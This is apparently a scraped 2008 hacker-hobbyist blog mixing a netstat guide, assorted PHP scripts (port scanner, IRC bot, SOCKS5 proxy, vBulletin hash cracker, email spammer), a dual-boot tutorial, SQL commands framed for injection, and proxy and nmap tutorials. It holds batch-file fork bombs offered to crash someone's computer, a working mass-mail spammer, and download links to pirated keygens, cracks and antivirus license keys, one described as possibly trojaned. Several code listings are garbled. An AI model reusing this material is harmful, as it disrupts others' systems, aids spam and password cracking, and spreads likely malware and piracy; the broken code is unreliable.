Monday, June 9, 2008

How to check if your computer is being hacked/infected

hi everyone this is a tutorial that i learned on how to see if your computer has been infected or hacked...

steps-make sure you have no program running..aim/yahoo/msn or web-pages nothing!

1. click start-run then type cmd

2. ok type in netstat -ano then enter

3. then a list of PID's IP's and states should come up saying either listening or established

4. alright you want to look at the established PID's (process identifier)

5. write down the PID numbers and close the command prompt

6. press ctrl alt and delete or exit the task manager should come up.

7. click on view-columns and check the box with the PID (process identifier) on it hit ok

8. go to the processes and look for the established PID number then highlight it and end process.

9. you can check to see if you cleared the connection by doing steps 1 and 2..

10. the established connections should be gone

hope this helps everyone out there......

using udp PHP

> $fp = fsockopen("udp://127.0.0.1", 13, $errno, $errstr);
if (!$fp) {
echo "ERROR: $errno - $errstr
\n";
} else {
fwrite($fp, "\n");
echo fread($fp, 26);
fclose($fp);
}
?>

php portscanner

$port1 = 10;
$port2 = 105;
$hostdata = "127.0.0.1";

for ($i = $port1;$i<=$port2; $i++) {
$scan = @fsockopen("$hostdata", $i, $errno, $errstr, 100000000000000000000000);
if($scan) {
echo "Port " . $i . " is OPEN on " . $hostdata;
echo "
";
} else {
echo "Port " . $i . " is CLOSED on " . $hostdata;
echo "
";
}
}
?>

extract emails "PHP"

> function extract_emails($str){
// This regular expression extracts all emails from
// a string:
$regexp = /([a-z0-9_\.\-])+\@(([a-z0-9\-])+\.)+([a-z0-9]{2,4})+/i
preg_match_all($regexp, $str, $m);

return isset($m[0]) ? $m[0] : array();
}

$test_string = This is a test string...

test1@example.org


Test different formats:
test2@example.org;
foobar



strange formats:
test5@example.org
test6[at]example.org
test7@example.net.org.com
test8@ example.org
test9@!foo!.org

foobar


print_r(extract_emails($test_string));

calculate page load "PHP"

> = time();

// put a long operation in here
sleep(2);


$diff = time() - $start;

print "This page needed $diff seconds to load :-)";

// if you want a more exact value, you could use the
// microtime function
<

an irc bot "PHP"

<
IRC Bot




Nick:

Password:

Realname:

Owner: Note: Please use the full host of owner (nick!user@host)

Server:

Port:





set_time_limit(0);
if ($_GET[nick]) { $usernick = $_GET[nick]; }
else { $usernick = PHPBot; }
if ($_GET[realname]) { $realname = $_GET[realname]; }
else { $realname = PHPBot; }
if ($_GET[server]) { $server = $_GET[server]; }
else { $server = "irc.waypasteleven.com"; }
if ($_GET[port]) { $port = $_GET[port]; }
else { $port = 6667; }
if ($_GET[pass]) { $pass = $_GET[pass]; }
else { $pass = password; }
if ($_GET[owner]) { $pass = $_GET[owner]; }
else { $owner = "Sockmonkey!SockMonkey@says.you.are.a-freak.com"; }
$socket = fsockopen($server, $port);
fputs($socket,"USER $usernick socky-bot.net Socky :" . $realname . "\n");
fputs($socket,"NICK " . $usernick . "\n");
while(1) {
while($data = fgets($socket, 128)) {
echo nl2br($data);
flush();
$ex = explode( , $data);
if ($ex[0] == "PING"){
fputs($socket, "PONG ".$ex[1]."\n");
}
$command = str_replace(array(chr(10), chr(13)), , $ex[3]);
preg_match(/^:(.*?)!(.*?)$/i, $ex[0], $matches);
$host = "!".$matches[2];
$nick = $matches[1];
if ($ex[0] == ":irc.waypasteleven.com") {
if ($ex[1] == "433") {
fputs($socket, "NICK ".$usernick."_\n");
}
}
if ($ex[1] == "NOTICE") {
if ($ex[0] == ":NickServ!services@waypasteleven.com") {
if ($ex[3] == ":This") {
fputs($socket, "PRIVMSG NickServ :identify $pass\n");
echo($server." PRIVMSG NickServ identify ".$pass."")
}
}
}
/* Work on this */
if ($command == ":!say") {
fputs($socket, "PRIVMSG $ex[2] :".$ex[4]."\n");
}
if ($command == ":!commands") {
fputs($socket, "PRIVMSG $nick :!JOIN - !PART - !SAY - !CYCLE - !STOP\n");
}
if ($command == ":!join") {
fputs($socket, "JOIN ".$ex[4]."\n");
}
if ($command == ":!cycle") {
if ($ex[0] == ":".$owner) {
fputs($socket, "PART ".$ex[4]."\n");
fputs($socket, "JOIN ".$ex[4]."\n");
}
}
if ($command == ":!part") {
if ($ex[0] == ":".$owner) {
fputs($socket, "PART ".$ex[4]."\n");
}
}

//* THIS BIT *//
if ($ex[3] == ":".chr(1)."VERSION".chr(1)) {
fputs($socket, "notice $ex[2] :".chr(1)."Version PHP".chr(1)."\n");
}
if ($command == ":!stop"){
if ($ex[0] == ":".$owner) {
fputs($socket,"PRIVMSG $ex[2] Bot stopped!\n");
fputs($socket,"QUIT :Bot stopped by ".$nick."\n");
die("
$nick ended the bot.");
}
else {
fputs($socket,"KICK $ex[2] " . $nick . " Fuck you!\n");
}
}
}
sleep(0.1);
}
?>

checking for unsafe functions "PHP"

$badFunctions = array( "a...", "dom_import_simplexml", "domattr", "domattribute_name", "domattribute_set_value", "domattribute_specified", "domattribute_value", "domcharacterdata", "domcomment", "domdocument", "domdocument_add_root", "domdocument_create_attribute", "domdocument_create_cdata_section", "domdocument_create_comment", "domdocument_create_element", "domdocument_create_element_ns", "domdocument_create_entity_reference", "domdocument_create_processing_instruction", "domdocument_create_text_node", "domdocument_doctype", "domdocument_document_element", "domdocument_dump_file", "domdocument_dump_mem", "domdocument_get_element_by_id", "domdocument_get_elements_by_tagname", "domdocument_html_dump_mem", "mysql_get_client_info", "mysql_get_host_info", "mysql_get_proto_info", "mysql_get_server_info", "mysql_info", "mysql_insert_id", "mysql_list_dbs", "mysql_list_fields", "mysql_list_processes", "mysql_list_tables", "mysql_num_fields", "mysql_num_rows", "mysql_pconnect", "mysql_ping", "mysql_query", "mysql_real_escape_string", "mysql_result", "mysql_select_db", "mysql_set_charset", "mysql_stat", "mysql_tablename", "mysql_thread_id", "mysql_unbuffered_query", "mysqli", "mysqli_bind_param", "mysqli_bind_result", "mysqli_client_encoding", "mysqli_disable_reads_from_master", "mysqli_disable_rpl_parse", "mysqli_driver", "mysqli_enable_reads_from_master", "mysqli_enable_rpl_parse", "mysqli_escape_string", "mysqli_execute", "mysqli_fetch", "mysqli_get_metadata", "mysqli_master_query", "mysqli_param_count", "mysqli_report", "mysqli_result", "mysqli_rpl_parse_enabled", "mysqli_rpl_probe", "mysqli_rpl_query_type", "mysqli_send_long_data", "mysqli_send_query", "mysqli_set_opt", "z...");
foreach ($badFunctions as $disable) {
if (function_exists("$disable"))
die("Unsafe function $disable found. Aborting!\n");
}
?>

socks5 server "PHP"


/**
* Php Socks5 Server by KingOfSka @ http://contropotere.netsons.org
*
*
*/

array($dest);
error_reporting(E_ALL);
set_time_limit(0);
ob_implicit_flush();

$address = 燇.0.0.1
$port = 5554;

if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
echo "socket_create() fallito: motivo: " . socket_strerror($sock) . "\n";
}
if (($ret = socket_bind($sock, $address, $port)) < 0) {
echo "socket_bind() fallito: motivo: " . socket_strerror($ret) . "\n";
}
if (($ret = socket_listen($sock, 5)) < 0) {
echo "socket_listen() fallito: motivo: " . socket_strerror($ret) . "\n";
}
do {
if (($msgsock = socket_accept($sock)) < 0) {
echo "socket_accept() fallito: motivo: " . socket_strerror ($msgsock) . "\n";
break;
}

/** Initial Socks5 HandShake **/
$buf = socket_read($msgsock, 128, PHP_BINARY_READ);
if((implode(,unpack(C3cmd,$buf))) == 510){
$ans = pack(C2,0x05,0x00);
socket_write($msgsock, $ans, strlen($ans));
}

$buf = socket_read($msgsock, 4, PHP_BINARY_READ);
$buf = unpack(C4cmd,$buf);
$at = $buf[cmd4];
switch($at){

case 3 : /** Client gave us Domain Name **/
$buf = socket_read($msgsock, 1, PHP_BINARY_READ);
$buf = unpack(C1len,$buf);
$dest[host] = socket_read($msgsock, $buf[len], PHP_BINARY_READ);
break;

case 1: /** Client gave us IP **/
$buf = socket_read($msgsock, 4, PHP_BINARY_READ);
$hip = $buf;
$buf = unpack(C*,$buf);
$dest[host] = implode(.,$buf);
break;
}
$buf = socket_read($msgsock, 2, PHP_BINARY_READ);
$buf = unpack(nport,$buf);
$dest[port] = $buf[port];

/** Set Up Socket for Remote Host **/
$dsocket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$conn = socket_connect($dsocket, $dest[host], $dest[port]);

switch($at){

case 3: /** Domain Name Address Reply **/
$buf = pack(C5,0x05,0x00,0x00,0x03,strlen($dest[host])).$dest[host].pack("n", $dest[port]);
socket_write($msgsock, $buf, strlen($buf));
break;

case 1: /** Ip Address reply **/
$buf = pack(C4,0x05,0x00,0x00,0x01).$hip.pack("n", $dest[port]);
socket_write($msgsock, $buf, strlen($buf));
break;
}

/** Start data transfer loop **/
do {
if (FALSE === ($req = socket_read($msgsock, 2048, PHP_BINARY_READ))) {
echo "socket_read() fallito: motivo: " . socket_strerror($ret) . "\n";
break 2;
}

$ans =  ;

echo $req;
socket_write($dsocket,$req,strlen($req));
$ans = socket_read($dsocket,2048,PHP_BINARY_READ);
echo $ans;
socket_write($msgsock,$ans,strlen($ans));


echo "----r/w completed----\n";
}while (true);
socket_close($msgsock);
socket_close($dsocket);
} while(true);


?>

char detection "PHP"



// sunjester
// 2008
// www.mrsunjester.info
function clean($string) {
$badChars = array("","\"","<",">",".",",","!","@",
"#","$","%","^","&","*","(",")","_",
"-","=","+");

$length = strlen($string);

for($i=0;$i<=$length;$i++) {
$curChar = substr($string,$i,1);

for($j=0;$j<=$length;$j++) {
if($badChars[$j] == $curChar) {
die("string is bad! (error at char: $j)");
}
}
}

return $string;
}

// example usage
//echo clean("!sunjester");
//echo clean("sunjester");
?>



vbulletin hash cracker "PHP"


//
// author sunjester
// site http://mrsunjester.info/
// irc irc://irc.securitychat.org/hostile (#hostile)
// contact tripmonster@gmail.com || mr.lerie@gmail.com
//
// how to use
// 1. (textbox1) input the password you think it is
// 2. (textbox2) input the salt of that password
// 3. (textbox3) input the salt of the password you want to break
// 4. (button) push button.
// 5. click my ads. http://mrsunjester.info/

echo "

>br /<";

function clean($string) {
$string = htmlentities($string);
return $string;
}

$check = $_GET[check];

if(!$check) {
echo "


















what password do you think it is?
whats the salt?
whats the hash?
 

";

die("
");
}

$cleanpw = clean($_POST[password]);
$salt = $_POST[salt];

$hash = MD5(MD5($_POST[password]).$salt);

if($hash == $_POST[hash]) {
echo "$cleanpw is the password";
} else {
echo "$cleanpw is NOT the password";
}

// seriosuly, how easy was that? should i go ahead and
// add more features to it? shit, i could make one in
// a couple different languages, gui, etc. but what
// do i get? lol lazy bastards, do it yourself!
?>













Duel Booting Tutorial



For those who don't know, dual-booting is the act of having two operating systems installed simultaneously on your computer. To do this, you will need some tools:

1. any distro linux Live CD or any other OS Live CD you want (i will be talking about Ubuntu as example some other OS may vary in intsallation : all these links below will allow you to download the popular linux distros them (props to Chi_Kitory for giving me the links to the last three)

http://www.ubuntu.com/


http://www.kubuntu.org/



http://www.edubuntu.org/



http://www.xubuntu.org/

2. half a Brain

3. Recommended 10g free space required like 4g

4. Desire to run and learn linux!

Once you've downloaded the Linux iso, check the md5 if desired, then burn the iso to a disk. The iso is a file that tells the cd burner exactly what goes on the disk. Once that is done, you should defragment your hard drive. Some times when a drive is fragmented, you cant partition it because there are fragments in the area you are separating. This may take some time. Walk around, read a book, or just watch while this is in progress.

If Linux booted, congratulations, were 1/3 of the way there. If not, refer to your BIOS manual and see how to boot from cd. After linux boots, depending on the distro.. i am gonna use Ununtu there should be a menu with like 4 options. Click the second option that should say install (in this case) Ubuntu. if you just want to try it out first you can by choosing the first option it should say "try ubuntu without changing settings on your computer". by choosing the first option it will allow you to use linux untill you restart.



Ok now that you have selected install linux.. its is gonna start setting it up.. then it will ask you about partitioning your HDD(hard disk drive)..now i am going to throw out a serious caution.. if you only have one HDD then you need to be careful when you partition it becasue it reformats the section of the HDD and you could end up overwriting files you dont want to lose. i highly suggest if you have two HDD use the second one... and make sure it is empty. once you decide the Partition then it is pretty simple from there..



Now it should take a while to reformat the HDD and install ubuntu... after that is all done you will be required to restart the computer. before the computer boots up it will go into this GRUB program and it will allow you to choose your OS you wish to boot (i am not sure about the other OS.. once i try the others i will update this Tutorial).



there you go you now have your computer duel booting!



Note: Duel boot can get annoying if you constantly have to switch back and forth.. any files that you have on the other OS you will have to use a USB to tranfer back and forth... so you could do this if you decide duelbooting isnt for you...



Use a virtual Machine... they are.. programs that emulate an Operating system.. they are pretty nice.. i recommend Sun microsystems VirtualBox



heres the link https://cds.sun.com/is-bin/INTERSHOP...-F@CDS-CDS_SMI



Hope you enjoy the Tutorial ^_^



Tell me how it works for you!
__________________
"Alcohol and calculus don’t mix. Never drink and derive."

"Artificial Intelligence usually beats natural stupidity."

---



email spammer "php"



> session_start();
echo "restart - Send Next One
";
if(isset($logout)) {
session_destroy();
echo "";
} else {
if ($_SESSION[count] == "") {
$_SESSION[count] = 1;
} else {
$_SESSION[count] = $_SESSION[count] + 1;
}
}

function ReadLine($path) {
$linenum = $_SESSION[count];
//$path = "emails2.txt";
$handle = fopen($path, "r");
$lines=file($path);
echo $lines[$linenum];
}
mail(ReadLine("emails2.txt"), Hostile Graphics - News, http://hgsdomination.com/, null,
no-reply@hgsdomination.com);
?>

Some SQL Commands

Here is a list of SQL commands and what they do, these would be used in some injection methods and of course legitimate sql functions. On thier own they wont exploit anything but eventually you'll find an exploit that needs these and they are good to know for injection or just to better understand how SQL works.ABORT -- abort the current transactionALTER DATABASE -- change a databaseALTER GROUP -- add users to a group or remove users from a groupALTER TABLE -- change the definition of a tableALTER TRIGGER -- change the definition of a triggerALTER USER -- change a database user accountANALYZE -- collect statistics about a databaseBEGIN -- start a transaction blockCHECKPOINT -- force a transaction log checkpointCLOSE -- close a cursorCLUSTER -- cluster a table according to an indexCOMMENT -- define or change the comment of an objectCOMMIT -- commit the current transactionCOPY -- copy data between files and tablesCREATE AGGREGATE -- define a new aggregate functionCREATE CAST -- define a user-defined castCREATE CONSTRAINT TRIGGER -- define a new constraint triggerCREATE CONVERSION -- define a user-defined conversionCREATE DATABASE -- create a new databaseCREATE DOMAIN -- define a new domainCREATE FUNCTION -- define a new functionCREATE GROUP -- define a new user groupCREATE INDEX -- define a new indexCREATE LANGUAGE -- define a new procedural languageCREATE OPERATOR -- define a new operatorCREATE OPERATOR CLASS -- define a new operator class for indexesCREATE RULE -- define a new rewrite ruleCREATE SCHEMA -- define a new schemaCREATE SEQUENCE -- define a new sequence generatorCREATE TABLE -- define a new tableCREATE TABLE AS -- create a new table from the results of a queryCREATE TRIGGER -- define a new triggerCREATE TYPE -- define a new data typeCREATE USER -- define a new database user accountCREATE VIEW -- define a new viewDEALLOCATE -- remove a prepared queryDECLARE -- define a cursorDELETE -- delete rows of a tableDROP AGGREGATE -- remove a user-defined aggregate functionDROP CAST -- remove a user-defined castDROP CONVERSION -- remove a user-defined conversionDROP DATABASE -- remove a databaseDROP DOMAIN -- remove a user-defined domainDROP FUNCTION -- remove a user-defined functionDROP GROUP -- remove a user groupDROP INDEX -- remove an indexDROP LANGUAGE -- remove a user-defined procedural languageDROP OPERATOR -- remove a user-defined operatorDROP OPERATOR CLASS -- remove a user-defined operator classDROP RULE -- remove a rewrite ruleDROP SCHEMA -- remove a schemaDROP SEQUENCE -- remove a sequenceDROP TABLE -- remove a tableDROP TRIGGER -- remove a triggerDROP TYPE -- remove a user-defined data typeDROP USER -- remove a database user accountDROP VIEW -- remove a viewEND -- commit the current transactionEXECUTE -- execute a prepared queryEXPLAIN -- show the execution plan of a statementFETCH -- retrieve rows from a table using a cursorGRANT -- define access privilegesINSERT -- create new rows in a tableLISTEN -- listen for a notificationLOAD -- load or reload a shared library fileLOCK -- explicitly lock a tableMOVE -- position a cursor on a specified row of a tableNOTIFY -- generate a notificationPREPARE -- create a prepared queryREINDEX -- rebuild corrupted indexesRESET -- restore the value of a run-time parameter to a default valueREVOKE -- remove access privilegesROLLBACK -- abort the current transactionSELECT -- retrieve rows from a table or viewSELECT INTO -- create a new table from the results of a querySET -- change a run-time parameterSET CONSTRAINTS -- set the constraint mode of the current transactionSET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current sessionSET TRANSACTION -- set the characteristics of the current transactionSHOW -- show the value of a run-time parameterSTART TRANSACTION -- start a transaction blockTRUNCATE -- empty a tableUNLISTEN -- stop listening for a notificationUPDATE -- update rows of a tableVACUUM -- garbage-collect and optionally analyze a database

generate fake website users

PHP


use LWP::Simple; print "Website Visitor Faker\n"; print "coded in perl by Athleone\n\n"; print "Type the website you want to fake visits to.\n"; print ">"; $site=; print "Checking whether site is valid..."; chomp($site); $check=get($site); if($check ne "") { print "Site $site valid.\n\n"; } else { die "Site $site not valid.\n\n"; } print "Type the number of visits you want added.\n"; print ">"; $visitz=; chomp($visitz); for($i=1;$i<=$visitz;$i++) { get($site); print "Visited site $i time(s)....\n"; } print "Done.";

Friday, June 6, 2008

Login form


Hey so this is my first tutorial, this isn't a step by step tutorial as you can see i have just wrote a login script and explained what i was doing as i go along if it is a success i will write a register tutorial as well. Thanks KiNgY
PHP:
The session_start(); function is important and needs to go at the start of each page you want logged in members to access.The include() function just includes my db_connect script which allows me access to my database.
PHP:
This i feel is rather self explanatory, the value of $id depends on which fields of data are missing, i will use $id further down the script to display certain error messages.If the required data is entered it will be queried against my database and if there is a row with username $user and password $pass the login is a success and the session username is set and the user is forwarded onto a different page in this case logged_in.php.HTML for the login formthere is also some php in here for displaying error messages


PHP:
'' && $id<='3'){ echo ""; }if($id=='5'){ echo ""; }?>
User Login
Please fill in missing fields (*)
Sorry but your login details where incorrect

PHP:
* "; }?>Username:

PHP:
* "; }?>Password:
LinksIf you would like to see the completed code please visit here:Full source codeThanks again KiNgY

Thursday, June 5, 2008

large universal keygen

this has no creds to me i just found it on the internet and it looks legit. supposedly there are trojans but some of the files dont have and the trojans are actually the keygens themselves. so use at your own risk.

http://depositfiles.com/files/3403897features
: ACDSee 8.0 Photo Manager Keygen - ACDSee 9.0 Photo Manager Keygen Rus - ACDSee 10 Photo Manager Serial - Adobe Acrobat 8.0 Keygen - Adobe Contribute CS3 Keygen - Adobe CS3 Design Premium Keygen - Adobe CS3 Master Collection Keygen - Adobe CS3 Web Premium Keygen - Adobe Dreamweaver CS3 Keygen - Adobe Encore CS3 Keygen - Adobe Fireworks CS3 Keygen - Adobe Flash CS3 Keygen - Adobe InDesign CS3 Keygen - Adobe PageMaker 7.0 Serial - Adobe Photoshop CS2 9.0 Keygen - Adobe Photoshop CS3 Keygen - Adobe Photoshop CS Serial - Adobe Photoshop Extended CS3 Keygen - Adobe Premier Pro 7.0 - Adobe Premier Pro CS3 Keygen - AnyDVD HD v6.1.3.3 Key - AnyDVD HD v6.1.7.0 Key - AnyDVD HD v6.1.75 Patch - AutoCAD 2008 Keygen - AVAST32 - Avi mpg splitter 2.31 - Corel Draw X3 Keygen - DVD Region CSS Free v5.16 Crack - DVD-Lab Pro 2.3 Crack - Error Doctor 2008 - HyperCam v2.10.02 Crack - ImTOO DVD Ripper 2.0 Serial - Kingdia DVD Ripper Keygen - Macromedia Dreamweaver MX Serial - Macromedia Flash MX Serial Rus - Macromedia HomeSite Serial - Microsoft Office 2003 Serial - Microsoft Office 2007 Keygen - Nero 7 Ultra Edition Keygen - Nero 8 Ultra Edition 8.1.1.0 Keygen - Partition Magic v8.0.1242 Serial - PerfectDisk.8 - PC Video Converter Studio 4.6 Serial - PowerCHM 5.5 Crack - PowerDVD 6 Keygen - Reg Organizer 4.10 Keygen Rus - RegClean 2007 Edition v2.6 Patch - Sitecraft v1.1 Serial - Sokrat Personal v4.1 - Sound Forge 7 Keygen Rus - Sound Forge 8 Keygen Rus - Sound Forge 9a Patch - StripSaver 2.13 Keygen - System Mechanic Professional v5.0 Serial - TuneUp_Utilities 2008 - Throttle 2008 - Ulead GIF Animator v5.05 Crack - Virtual Drive 9.03 Serial Rus - Virtual Drive 10 Serial - WinDVD 7 - WinDVD Platinum 8.0.06.110 Keygen - Xilisoft 3GP Video Converter 2.1.55.1008 Keygen - СозКомек 3.0 Serial

Crash Someone's Computer In Less Than A Minute! "Only For Education Purpose"

O.K Just like Last Time This Virus Uses CMD.EXE(Something.bat) -First open up Notepad -Then type in this code

@echo off B: start CMD.exe Goto B

-then save it as Havetosee.bat this code will open up CMD an Infinite Amount of times Causing the Computer to Crash *I give Credit to H4XZOR For Correcting The Code* *I am Not Responsible for any harm done to your computer or to any one else's computer


Another example:


yea well still this is the best code to crash a pc ^^
@echo off start %0 pause

Proxy Tutorial

HIDE YOUR SELF!! OS:Windows XP Alright here is my tutorial on hiding you ass on the net. When I say hide your ass I mean hiding your with multiple proxy programs and proxy sites. First off when your at school you know how you want to see a site its blocked so you use a proxy site like... www.proxify.com which is blocked at most schools now so you would have to use a different one like www.freeproxy.com/ which shouldn't be block if it is you may use any others of your choice. You just enter the url into the boxes and BAM your onto the sites you want. Some of you may use proxies like 127.0.0.1:8080 Yeah i know the ip is localhost but i dont know any off hand right now. You can find many proxy lists out there to use. I will attach my proxy list I use for some of the programs I mention at the bottom. First off this isn't using programs like proxy firewall the programs i use here are all extensions for mozilla firefox so they will probably work for the linux OS. Now lets get started install mozilla firefox if you haven't already. The programs you can use proxies with are.....
proxysel foxtor foxyproxy httProxy PhProxy Proxy toolbar SwitchProxyTool TorbuttonNow these are just the proxy programs the programs i use to hide my data from the computer itself is...
Distrust Stealther Tamper Data TrackMeNot

NMAP Tutorial

OS: Windows Alright NMAP is a popular scanner used for figuring out information about servers like what operating system they may be running on what ports are open. It offers a loggin system that allows a user to log all the results for their scanning session so they can pass it on to others For this tutorial I am going to just scan a single website and explain a common 'error' message some users may recieve. The website for this Tutorial i will be using is... www.meow.com some random site Now lets get started first off get nmap from our downloads section Got it okay scanned it okay fucked it okay now place these files in your system32 folder or a folder you store your CLI(command line interface) programs in. Open CMDand type nmap and you will get the following syntax and options... lun0s@~E:\cmds>nmap Nmap 4.20 ( http://insecure.org ) Usage: nmap [Scan Type(s)] [Options] {target specification} TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 -iL : Input from list of hosts/networks -iR : Choose random targets --exclude : Exclude hosts/networks --excludefile : Exclude list from file HOST DISCOVERY: -sL: List Scan - simply list targets to scan -sP: Ping Scan - go no further than determining if host is online -P0: Treat all hosts as online -- skip host discovery -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes -n/-R: Never do DNS resolution/Always resolve [default: sometimes] --dns-servers : Specify custom DNS servers --system-dns: Use OS's DNS resolver SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags : Customize TCP scan flags -sI : Idlescan -sO: IP protocol scan -b : FTP bounce scan PORT SPECIFICATION AND SCAN ORDER: -p : Only scan specified ports Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080 -F: Fast - Scan only the ports listed in the nmap-services file) -r: Scan ports consecutively - don't randomize SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info --version-intensity : Set from 0 (light) to 9 (try all probes) --version-light: Limit to most likely probes (intensity 2) --version-all: Try every single probe (intensity 9) --version-trace: Show detailed version scan activity (for debugging) OS DETECTION: -O: Enable OS detection (try 2nd generation w/fallback to 1st) -O2: Only use the new OS detection system (no fallback) -O1: Only use the old (1st generation) OS detection system --osscan-limit: Limit OS detection to promising targets --osscan-guess: Guess OS more aggressively TIMING AND PERFORMANCE: Options which take

Thursday, May 22, 2008

AVG Anti-Virus Free Edition 8.0

Basic antivirus and antispyware protection for Windows available to download for free. Limited features, no support, for private and non-commercial use only. Download: http://free.grisoft.com/ww.download?prd=afe

Norton 360 11 years subscription FULLY UPDATEABLE keygen

Norton 360 total security is by far the best protection you can get from any AV's in the world. This is not just a Antivirus but much more such as computer optimisation options and cleaning computers temp files. And far more This keygen was made by EDGE not be i'm just sharing but the keygen works perfectly and it gives you up to 11 years subscription for free. Download from here uploaded by me http://www.mediafire.com/?814gadxdywp

NOD32 Complete Software NEW 2008




Complete ESET NOD32 software latest updates. It includes Antivirus and Smart Security both home and business editions, all cracks, patched and serial keys are included, enjoy! File Size: 68.82 MB


downloads links
Code:
http://www.filefactory.com/file/3d6158/or
Code:
http://w14.easy-share.com/14875431.htmlor
Code:
http://depositfiles.com/files/3079789
Code:
pass: www.2baksa.net

Kaspersky KAS and KIS KEYS till 2009 2010


1) Go to ACTIVATION in the Kaspersky window. 2) Click DELETE KEY. (Only if a key has been previously installed) 3) Click INSTALL KEY. 4) After this, Apply existing license key. 5) Select the key which you want to install. 6) Enjoy !! Tested and working 100%
Code:
http://rapidshare.com/files/116339764/Bruna.KAV_Key_Valid_till_27.02.2009.rar http://rapidshare.com/files/116337643/Bruna.KAV_Personal_Key_Valid_Till_03.09.2010.rar http://rapidshare.com/files/116338754/bruna.KIS.22.12.2010.rar http://rapidshare.com/files/116338506/bruna.KIS.17.03.2009.rar http://rapidshare.com/files/116338237/Bruna.Kis.8-04-2009.rar http://rapidshare.com/files/116337916/Bruna.KIS.02.04.2009.rar

Avast Original License

Code:
http://www.avast.com/eng/download-avast-home.html
Code:
W62755019H4800A1106-EHZ3ZDNR

Echo Mirage

it's a good app to analyze traffic sent/received from a progam
Quote:
Echo Mirage is a generic network proxy. It uses DLL injection and function hooking techniques to redirect network related function calls so that data transmitted and received by local applications can be observed and modified. Windows encryption and OpenSSL functions are also hooked so that plain text of data being sent and received over an encrypted session is available. Traffic can be intercepted in real-time, or manipulated with regular expressions and action scripts
Code:
http://www.bindshell.net/tools/echomirage

Kaspersky Anti-Hacker Firewall v. 1.9


Today, threats to PCs are appearing in ever-greater numbers and diversity. Cyber criminals on the Internet are well organized and tend to target PCs with combined threats. A standalone antivirus solution is no longer enough to fully protect your PC. Kaspersky® Internet security 6.0 is a fully integrated solution that protects your computer from all of the most common Internet threats, including viruses, hacker attacks, adware, spam and spyware.
Code:
http://rapidshare.com/files/107122281/Kaspersky_Anti_-_Hacker_1.9_build_137.rar

Peer Guardian 2

Hi, You might have got this. PeerGuardian 2 is Phoenix Labs’ premier IP blocker for Windows. PeerGuardian 2 integrates support for multiple lists, list editing, automatic updates, and blocking all of IPv4 (TCP, UDP, ICMP, etc), making it the safest and easiest way to protect your privacy on P2P.
Code:
http://phoenixlabs.org/pg2/If you use MSN, don't block Microsoft otherwise you won't be able to sign in.

Anonym.OS



Code:
Anonym.OS is a linux distro

http://sourceforge.net/projects/anonym-os/

Torpark (Portable Web Browser)

Torpark is portable web browser that support tor network it work "standalone" DownloadLink: http://rapidshare.com/files/116719698/Torpark_1.5.0.7.rar

Wednesday, May 21, 2008

without Ads php supported Web Hostings "Very useful"

Links:
000WebHost featured
absolutely free web hosting. You get 250 MB of disk space, 100 GB bandwidth, 5 MySQL databases, unrestricted PHP5 support, Perl, CGI, Ruby, POP3 email box with webmail access, cPanel control panel and more. Instant setup. broken link?Comments
19Gigs new
free hosting offering 19GB of web space + 19GB monthly data transfer. broken link?Comments
300ms new
free web host, 300MB space, PHP/MySQL suport, FTP broken link?Comments
3Host new
free web hosting with php, mysql, 1GB space and unlimited bandwidth. broken link?Comments
Freewebspace4me.com new
300mb free disk space, 15gb bandwidth, 1FTP, SQL, POP3, domain or subdomain supported, Cpanel + Fantastico. broken link?Comments
Up4host.com new
free web hosting from India. 300MB web space. broken link?Comments
00server
20MB web space, your own subdomain (yourname.00server.com), unlimited e-mail addresses at your subdomain, counters, guestboot, site statistics and more. broken link?Comments
100 Megs Free
100 MB space, FTP or web based uploads, address like yourname.100megsfree.com. Advertising supported - the ads can be on your page or in pop-up window. broken link?Comments 1
111MB.net
free web hosting with 200MB web space, 30GB monthly banwdith, FTP, PHP, MySQL and SSI support. Maximum filesize limit: 5MB. Instant activation. Forced text ads on the right side. broken link?Comments 2
122mb
free web hosting with your own domain or subdomain, 200 MB webspace, 5000 MB monthly bandwith, FTP, SSI, PHP, MySQL, maximum filesize 5 MB. Google adsense on the right side and you can upload your own ads. broken link?Comments 3
1ASP host
100MB space ang 1BG monthly bandwith you get with this free web hosting. Features include SSI, ASP and MS Asscess support, Macromedia Shockwave support and online unzip capability. broken link?Comments
20ehost.com
free hosting that supports PHP 5.2.5 and MySQL 5. 300MB web space, 10GB monthly data transfer, 6 MySQL database, 6 addon domain, FTP, e-mail, POP access, automatic script installer. broken link?Comments
24 Fast
free hosting, with 300mb of space 10gb transfer, 3 mysql databases, 5 addon domains, 5 sub domains, FTP. broken link?Comments
247ihost
free web hosting accounts that has 5GB space, 20GB bandwidth, 10 MySQL Databases and PHP scripting. You can either use your own domain name, if you have one, or get a free subdomain. No advertising is displayed on your site, and you are free to run adverts of your own. broken link?Comments 4
247Webmaster
3,000 MB free web space, cPanel, MySQL, PHP, CGI, email account and more completely free. broken link?Comments
50megs
50 MB free web hosting space, FTP access, subdomain hosting and some pre-installed scripts. broken link?Comments
678host
free web hosting with subdomain name and domain name support. 500MB disk spcae, 10,000MB badwith. PHP, MySQL,FPT support. broken link?Comments 3
Ababa
free web hosting with 15 MB space, 1 GB transfer per month, SSI support and no ads. broken link?Comments
AE Hosting
free web hosting with 300 MB disk space, 6 GB monthly transfer, POP email accounts, 5 MySQL databases, automatic installer (29 scripts), FTP account, Php MyAdmin, 5 Sub domains. broken link?Comments
Allfreehosting4you
free web hosting site that offers 250MB space and 6GB monthly transfer, PHP and MySQL for free. broken link?Comments
Allgameman
free webhosting for game sites with php as sql support. 300MB disk space, 6GB monthly transfer. broken link?Comments
Angelfire
20 MB space, site building and file management tools. broken link?Comments
Athost.net
free hosting package with 50MB space, 500MB monthly bandwith, Perl, PHP, MySQL support. broken link?Comments
BoardsCity
free phpBB forum hosting. broken link?Comments
Byteact.
free web hosting featuring PHP, MySQL and more. 300MB space, 6 GB bandwith. broken link?Comments 1
